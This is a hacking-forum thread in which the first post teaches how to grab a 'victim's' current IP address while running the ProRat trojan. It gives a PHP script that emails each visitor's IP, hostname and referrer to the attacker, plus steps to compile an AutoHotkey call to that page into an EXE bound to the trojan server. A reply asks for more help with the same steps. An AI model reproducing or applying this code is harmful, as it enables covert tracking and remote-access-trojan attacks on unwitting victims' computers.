mrtg
+ Reply to Thread
Results 1 to 2 of 2

Thread: ProRat *.* SE how to grab victims WAN

  1. #1
    Join Date
    Jul 2008
    Posts
    1

    ProRat *.* SE how to grab victims WAN

    I&#*80;ve searched REALLY long for a tool that grabs the WAN of a victim and i finally found it!

    What you need:
    -> A webspace
    -> Create a free on [url]http://www.tripod.lycos.com[/url] or [url]http://www.netfirms.com[/url]

    -> AutoHotkey
    -> If you haven&#*80;t, google for this

    -> Cute ftp or FileZilla

    -> Notepad ++ or an other text editor

    How to:
    *. Create a new php script.
    -> If you can&#*80;t, create a txt file and rename it.
    2. Edit it with Notepad ++
    -> If you haven&#*80;t this program choose another text editor.
    *. Copy and paste this code into the script:
    Code:
    <?php
    
    $email = "yourmail@anything.com"; // ENTER YOUR EMAIL ADDRESS HERE
    
    if ($_SERVER['REMOTE_ADDR'] != "*28.22*.*88.*7") {
    if(array_key_exists("HTTP_REFERER",$_SERVER)) {
    $body = $_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."\n".
    date("Y-m-d H:i:s")."\n".
    $_SERVER['REMOTE_ADDR']."\n".
    gethostbyaddr($_SERVER['REMOTE_ADDR'])."\n".
    $_SERVER['HTTP_REFERER'];
    } else {
    $body = $_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."\n".
    date("Y-m-d H:i:s")."\n".
    $_SERVER['REMOTE_ADDR']."\n".
    gethostbyaddr($_SERVER['REMOTE_ADDR']);
    }
    mail($email, $_SERVER['REQUEST_URI'], $body, "From: ".$_SERVER['REMOTE_ADDR']." <".$email.">");
    }?>
    4. Upload the php script to your webspace.
    5. Go to the script by internet browser([url]http://yourname.tripod.com/script.php[/url])
    6. Check your E-Mails
    7. If nothing arrives in * Minutes something in the script is wrong...
    8. But if something with your IP arrives, that means it&#*80;s allright.

    But your victim don&#*80;t want to visit this site? No problem!
    Follow the next steps:

    *. Create a AutoHotkeyScript
    *0. Copy this code and paste it into your script:
    Code:
    Run, ***
    -> *** means the link to your php script
    **. Convert the AHK script into an EXE-File
    *2. Bind this EXE file with your server

    Now when your victim opens the server, the website will be opened in his internet browser. Every time your victim comes online you will become an e-mail with the current WAN IP of your victim.

    Hope this was helpful for you.
    Last edited by ProRat-Hacker; 07-20-2008 at 02:21 PM.

  2. #2
    Join Date
    Jul 2008
    Posts
    3
    i made the script with that code... and i put my mail where between the " " but the code is not working i dont recive my ip in my mail adress when i go to the link ...... please help me i really want to learn this
    and you also give more details in how to
    *. Create a AutoHotkeyScript
    *0. Copy this code and paste it into your script:
    Code:

    Run, ***

    -> *** means the link to your php script
    **. Convert the AHK script into an EXE-File

    thanks.. i will wait for one answer

+ Reply to Thread

Similar Threads

  1. Replies: 1
    Last Post: 08-03-2008, 08:51 AM
  2. ProRAT Help, Lol
    By Zallomallo in forum Viruses and Trojans
    Replies: 1
    Last Post: 09-29-2007, 01:31 PM
  3. ProRat 2.0 SE
    By goose192 in forum Viruses and Trojans
    Replies: 1
    Last Post: 05-20-2007, 04:48 PM
  4. Grab a password from a cookie?
    By Unregistered in forum Internet Privacy
    Replies: 0
    Last Post: 07-24-2005, 05:07 PM
  5. Zero-Knowledge, NAI PGP - terrorism victims?
    By Blacksheep in forum Security & Encryption
    Replies: 0
    Last Post: 11-09-2001, 01:35 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts